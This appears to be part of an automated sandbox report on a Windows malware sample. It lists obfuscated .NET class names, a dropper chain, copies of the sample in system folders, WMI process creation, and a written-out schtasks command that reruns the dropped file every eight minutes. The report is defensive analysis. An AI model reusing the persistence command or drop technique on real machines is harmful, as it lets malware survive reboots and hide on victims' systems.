Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, eckKw3ICJ3NiQjPxZlS.cs	High entropy of concatenated method names: 'I1NPnFAbgU', 'DTdPdfGxag', 'uYtjhlAUmPn0LOTW1LO', 'pA5bmsAvYr2rjj1fEWN', 'YmG7U7AoUTR79yQHfrd', 'qLvcYeAcwVhDoqn8gTG', 'c1pPVn5ybK', 'tkutn1mDoYy7eDalni2', 'YBmEWtmFiwxjUhlPPhb', 'oAXh1cAquPUnCDq8MTG'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, ebWTGG2As9XwNDltPaM.cs	High entropy of concatenated method names: 'bWcFfPqjfR', 'D25D2DSiebsIGVtxjsD', 'NydDQESOa1sIIEGmhyJ', 'OIas9BSHorgXRjUWchU', 'DDBb9SSkwUSp4sK6SmD', 'AmHNEZS7GNvUnbSJeAj', 'QLw', 'YZ8', 'cC5', 'G9C'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, u9TgSah5I3CLNfoU8a.cs	High entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'SZQ3NkRwmVD4GcNuwQa', 'K1q4vaR6NaO3Mq4Nshy', 'vIjrQrR2lPf3CLh1eoK', 'WXn4enRtxP9MYul8pwc', 'b7SoafRPydhgElBHLig', 'UQdPkhRllSJuMq9f95j'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, N0tudA4OxjIJWd9im5E.cs	High entropy of concatenated method names: 'Ose0jSooyP', 'GClVGuyM8MKY5Ltn8gO', 'PWYMfnyfjevQo2D6E1L', 'SkxEMHyaQicYF3Ncdnn', 'AdAb1GyNHLaRP1eDNvh', '_1fi', 'AVKaYuM5ny', '_676', 'IG9', 'mdP'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, crsQKb20shoSYAWaBuq.cs	High entropy of concatenated method names: 'PDuRp3KGaE', 'wSfRcLvM8O', 'EUuR1mA9rg', 'fXmQWQ6wvmT2vbsIAUB', 'P2WlfR6Yj7aCZ2oMRbi', 'ygkBww6SyY3QimR6XtV', 'ruAIIH66JaSKOITBxPw', 'eeGU4462hTPqFEZWnRK', 'YI7suP6t7A4EGIOoJqE', 'IpHvJm6PoFhWhffSNqT'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, WQhBAZIj0S1jRVVkUa5.cs	High entropy of concatenated method names: 'vuCgykLTN8', 'xQrgQUlLOT', 'uEkZjxlibasMPqmhtp2', 'YWUPEylOqBtS00k451K', 'lWclDYlHUCvQEOZwEP8', 'TSamiDlkKVidljE3s2G', 'Facut3l7HHiYKpGiU69', 'xVAxaUlJALUFQFYFA9V', 'H2QuTPlaJawyRvA0OAf', 'cCY2OXlN4N6cQ5jD6B4'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, pRDTm2m7Lvxwxx9grjk.cs	High entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'RLCqcbwF6A', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, IBJb4pvQGTby7L9HAQq.cs	High entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'GiKyCp6LoZ', '_3il', 'mJQyFi43f8', 'R1LyR5L3ag', '_78N', 'z3K'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, nq1vOOInm3dUyYwjqAj.cs	High entropy of concatenated method names: 'rOqmhjpNxg', 'eFLmtZyOYF', 'me2JDBPsHqxuQmw2TIU', 'O2DPJsP8mdDHvhKhRmF', 'LWXM9tPKIp8itBJJGD2', 'waB7IqPgyv46skpJ3Uv', 'YJ5dx1PHpg9MT1SMGc8', 'LBNADgPkkR03vpbWEEs', 'jtKVMcPiv7T0pL7XH2j', 'SiplrZPONg3F8wd4Miu'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, k6Q7Ue46yWpKxxnE5mt.cs	High entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, Ateuduv5wmXmGeH0mog.cs	High entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, YIvd3km3o1ErL2ERwiS.cs	High entropy of concatenated method names: 'Rrj1Xqbrnc', 'V5j1Z5O82D', 'VlSlWgXcwYjBYMb3ngV', 'l1q8K4XUE4vtvydMDGY', 'fnDDwnXvDhFFrV7qR5T', 'G2YuPjXjmTQKyHtltnp', 'QbVIJfXZJQs0tDGAwpk', 'JetceTXqswuqSkR8Gfn', 'jaCpPjXzot83LLsgeeW', 'oACeSP0Dx1XX0ZTioDM'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, FlKofMbPV92hjqlDne.cs	High entropy of concatenated method names: 'bPb1Xk85R', 'hSSqdCG0M', 'xsWstgqgr', 'SY2TxOlJj', 'st9aW57bW', 'or40MX5lR', 'iH4oMFMQJ', 'xdwGtYF4CPX3CW7NQmc', 'NZVhGaFY0GHgKk9x6XB', 'obHhGOFSwnT9S3EU0lW'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, pTYJ6HpBKpXqnPqyqQ.cs	High entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'kZ8XbIdpb7lIRgn10OG', 'vIKlYddTnY4l936R5Q5', 'u7PkmYdb7XdhSI1uvnW', 'p9nspmdLfZdjrex4k3J', 'QySZMsdE6iiq6ZoG97l', 'lbOwUrdQ3TRbE2iVbqU'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, cDmgOx26uH3neiGaodU.cs	High entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'rlpvNl4bLUrmyeDEmqw', 'lb4SFc4LnSXfYNlPW5U', 'rc9Ncc4ETOoVFIUjwCG', 'cMM96m4Qe4ge3CIioKX', 'cLT7YL4W9qXtR9Ol37w', 'EOcEIR4o8gMjwdHUcEm'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, xS8eu0Lx2Z1r0UOP92.cs	High entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'HxuQIJdlFGkV8SjbDqh', 'Q9JEssdxvurymxtTaiU', 'sBVrEnd1rjomM6ZiNTK', 'H88c6ddAqv3BhCJniEV', 's0BP3IdmTSkrbbNZiMO', 'QQf6Hkdsg4CNh80ngRQ'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, ojkvAqII2u4jbQvTaGv.cs	High entropy of concatenated method names: 'GKARI5IrW5', 'BUmR6qOgPN', 'O84RbSdGdQ', 'E8VRYKIXLe', 'Mp9R8QVgA0', 'iZHRfCO4wJ', 'vBRN3V2AaIWZ6UoPN11', 'BJD7l82mbFmlOEcP7FP', 'G4EvCg2xnkhP9y5AaTo', 'Qgk9lr21mk6NnyOW9tA'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, wdK8A2RMb6og1sUd05.cs	High entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'qPt1GAnX0mkDkIUlYeH', 'eYmWA2n069LKIbWv47L', 'YBGmPfnBWGmkoUL8f9R', 'v9QweInIMQZfIUWeC1V', 'VfH0Ucnui9EYU1ROxeN', 'QF2U99nhEGMAhpki3o9'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, IcB0iAq475yjHpq1Rj.cs	High entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'oo1qgerwqK7X6Ugt98S', 'c5I18cr6TCUYdun4T6K', 'QV4Vtnr2XNq4NmVul8I', 'V1F2nertBr6iZXKJNVr', 'D3l9KerP0PZpaxKnWBq', 'vvyjblrlvMAK7tUAUCW'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, eHBCCo2RgVI7pheBO4N.cs	High entropy of concatenated method names: 'gMsFhvXjwq', 'VCIdtAS0ImMngUhhdfT', 'wf55fHSB7oioMxC484r', 'yxNK9WS3jSs5xqbM3K2', 'oEm2ysSXWQPefYFvyGg', 'zS9AEvSIP1DGT2prsJA', '_3Xh', 'YZ8', '_123', 'G9C'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, UWKsHbIA9Xuo1udtE5L.cs	High entropy of concatenated method names: 'uZseosNopd', 'YBgLNS1ZI7bTSSjsyw3', 'rkt3Wy1qrMfyt2fdhHu', 'zTGcOt1vT00oicUfe4P', 'lkDPhg1j2YUu5xMebdo', 'uQtmkE1zSpAuLHoYtRo', 'DwO29xADDLBVRSKbton', 'kCR9yuAFxer6C1FxExD', 'JB2v3jARXJ7Daiyc7GP', 'fYEUxYAn4eSqfOaUfQ3'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, zAUuJ1guRoQ0B2pZg7h.cs	High entropy of concatenated method names: 'U9vdSh382w', 'mNUdWByYYo', 'Np9dVEQFxu', 'U0g85CgyScBFSB4bNMd', 'pMknE8ghS0ZntNh1OVW', 'QGaSCXg9FS51kvCoFuy', 'NYHls6gpVKqKnUWntjv', 'GTIdP2sG0T', 'QK1dBsS8Yn', 'xvPdngqtw4'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, TlakP3Iwg3wClJlNOfq.cs	High entropy of concatenated method names: 'iVqmz8kwqn', 'Y5lgCKbhmt', 'zcVgFImcoe', 'X1WgROxfWi', 'JHxgmrjPoN', 'O50ggpDWdx', 'Rhpge89D44', 'LDugPx2NBY', 'ASCgBXsVfE', 'vnagnPn60o'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, AZ1o7A4Sak0ydF0JgUq.cs	High entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'l0YTqdnDXn', 's22TsCwwkM', 'kLATTeyYkF', 'd3OTa2WAGf', 'HQLT02BtXC', 'tR4TopLsaQ', 'qNEobP90W10Ah5fvM3v'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, LT9Defvphtho57cP1uP.cs	High entropy of concatenated method names: 'nr7SqfmYcD', 'rdMSTbNBUp', 'QU4Sy1Asf1', 'ksrSQ3XK2Z', 'NWHSSg0feH', 'rruSWZwKPv', 'afASVBRqSA', 'rKdSvL5o1P', 'U4VS2ompDX', 'nfDSNV2WM0'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, w6ccF8gFfddtqcsUAeE.cs	High entropy of concatenated method names: 'E4NnwFPD8x', 'Yujn9k66xD', 'POcnrqWsnn', 'ohDnDKooW7', 'Cv653PKGK7maCg6S80h', 'kukwaMK3NxV4VKI87iL', 'gHp28bKX9ZObDpInHmr', 'POo5pCKefwlKR9JMx42', 'bUM6OqK5s5lCTUuOwVM', 'BMyZhWK05D45pmlxEha'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, OlNV1Xvd1M7owK6o3Vt.cs	High entropy of concatenated method names: 'GyQQhCFMN7', 'qMAQlkQTL3', 'nCsQHlFZON', 'B5GQGw0myo', 'kbAQj6ESFo', 'YxCQ720FVd', 'vuxQioy3Uc', 'NNJQ5xgcut', 'dDJQuOiQdM', 'wkmQwIUGSm'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, D9VZcZgQG5BKh0THRQd.cs	High entropy of concatenated method names: 'gacd4nxHDI', 'rEXdEK5wUc', 'Mn8iWgHmlbwI6E5xmFa', 'zRZscBHsh64KTblF1Cd', 'P7bB9oH1IkI8JmeUbSA', 'I3gMygHAtSPb6WrC7MA', 'SfEreVH80ikapACnVbJ', 'TGdUWWHKeAA0ahFDwxe'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, vdgy9FCtkiYlTBW3KR.cs	High entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'I5NDZbnvwelJTaM5GHo', 'mTxuVunjwgabcxMhZjd', 'ihjPWQnZZXtojho9Pfk', 'JZMid2nq6GvRVQ3vdr5', 'jceohpnzdPDXR7RJwis', 'XHMY8nrDfFUh9momo4p'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, Ch6Gc54IYIviMj3YDa1.cs	High entropy of concatenated method names: 'zvfsnF06T9', 'gNtsd5eE0O', '_8r1', 'tCTsLEATgu', 'bfOsxqlY7U', 'T30sJbkJlV', 'sPKskJQGoZ', 'kDx5YtuxH8iikXCQCBo', 'cO8DwFu16xWyXcbQkFs', 'Dl07UDuAgAFSycUIPfr'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, B5ilpwmgh9qUBeF8Tw7.cs	High entropy of concatenated method names: 'vg1qvO5HICDkSeMJR4P', 'o6a7Dc5kJ8sajlFHipC', 'CsWV0I5KvioSPuCB2h1', 'udaxun5gKqBRYYa7VAs', 'XNvX1xHwgM', 'hDP7s257k9WT4FHsL8j', 'e8RwwJ5Jjqy18wyDyNE', 'PURwoM5iyYMJfkww4B7', 'yPKmao5OZX4gCyfIdXw', 'WZ83le5artkqupBwWTu'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, U407CPgLjSDeMFpxjvK.cs	High entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'doxLxaVNbV', 'eViBwUVCGN', 'aUhLJgqsGJ', 'GygBp9Mn3v', 'iAca5lkBfyen8DQguL0', 'fdBpHLkIlFXJUG2Aesr', 'sEowCHkXHupRKC36uLy'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, eOigRYv3fJwQemaSbBY.cs	High entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, qwQVq9VADVsiQmm4H1.cs	High entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'X4bFqHRZkNHCstxBxVM', 'wSVuskRqWATX94fRbGi', 'o7255tRzESdYgEn5qv5', 'Cv1ImWnD54NpfPmm6T3', 'Il9MtRnFjEuo4yhImKw', 'lxxt5QnRPB452rGheKG'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, l2cWVj2ELpNnFJkPWuH.cs	High entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'K4tgfVCoEbERGo9v42P', 'EZFFngCc8ExxLNIaIu6', 'KwEjBZCUSMhU7GnE0te', 'jsF1gpCvPRLLBriX98Z', 'cSjl1kCjcVaU9Pfn3rU', 'CTGaJGCZE59Voi0gpZf'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, CquFGMsHA1UA6dqnZp.cs	High entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'N4QKCydVa429qhxGfHp', 'FbU4MudC0hATlFWLbPG', 'gyaagVd4ZbxnACiik7K', 'FXRlWldYxqAZR4UvisE', 'IiSihRdSOsu8njTyIyT', 'fIGvPodwPX9NWBGD0HA'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, LTgCPKgPbpraxt1a2FF.cs	High entropy of concatenated method names: '_5u9', 'TugBYIMMa4', 'ghfLC1rx9l', 'zDsBxEjwQh', 'lV7id1HjP55FOG1ew1B', 'KeOpJrHZsyIlMi9N2m7', 'MjLSovHqsnKRkcMKH2v', 'M0udnMHUYIxkhoE0fLD', 'PF30OFHvTts1EESr6Sk', 'SjyHQTHz7XnLpAc7im6'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, DrRaUqY6sINXcF8RPIc.cs	High entropy of concatenated method names: 'gUY31HrPUA', 'XMF3qhj6BZ', 'fl23so4wyh', 'pTS3T6FHpo', 'mis3aJAoe6', 'AHb30EhMR2', 'WRJ3ovD9kd', 'iDe3AyFq0D', 'Ub333HjKiZ', 'xlS34ZZOd5'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, aYE1DNIZNSd6JR8kVCr.cs	High entropy of concatenated method names: 'iOQRqqTt15', 'wthRsF5yPv', 'Ax6RTp6Q0P', 'l5QSxN65aS7J8ZcuSBp', 'PTNvOY6G8ubgI8slSTv', 'IZp1cg637YHIp5D7wyX', 'MRfD7R6XENrTRk0gADE', 'M58S7r60I6isR01BB58', 'Btb5bb6BjRJaY5nGEp6', 'WuZAbq6fY8D9QIMpO5F'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, sxbJ5Sm0t8TWssXyZOf.cs	High entropy of concatenated method names: 'pm7qafvM7m', 'NDDq04DsYy', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'zkRqoSUNi5', '_5f9', 'A6Y'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, dRRl8MvmMMV8p1nrvDZ.cs	High entropy of concatenated method names: 'zGJJVScf69', 'TIFsreOmcNxu1Wh2c1O', 'aoYsYfOsfc3uaOosoDD', 'mckT41O17FfXqFT56no', 'N5rcwsOA9vxdvfZxDnP', 'aTSLA41tdN', 'ANSL3QNLDR', 'WZqL4wqJXl', 'pJdLEwDf0s', 'EnXLlvUFHT'

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	File created: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	File created: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File created: C:\Windows\Provisioning\Cosa\UplbXNLOfTNXjbhPJQLmKdgT.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File created: C:\Windows\Tasks\UplbXNLOfTNXjbhPJQLmKdgT.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File created: C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	Jump to dropped file
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	File created: C:\Users\user\AppData\Local\Temp\1874e204d87ca9f9141be23ebad23e1fefcf2d8c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File created: C:\Program Files\Windows Multimedia Platform\UplbXNLOfTNXjbhPJQLmKdgT.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File created: C:\Users\Public\Videos\UplbXNLOfTNXjbhPJQLmKdgT.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File created: C:\Users\Default\AppData\UplbXNLOfTNXjbhPJQLmKdgT.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File created: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File created: C:\Windows\Provisioning\Cosa\UplbXNLOfTNXjbhPJQLmKdgT.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File created: C:\Windows\Tasks\UplbXNLOfTNXjbhPJQLmKdgT.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 8 /tr "'C:\Users\Default\AppData\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f

Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe

File created: C:\Windows\Tasks\UplbXNLOfTNXjbhPJQLmKdgT.exe

Jump to behavior

Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
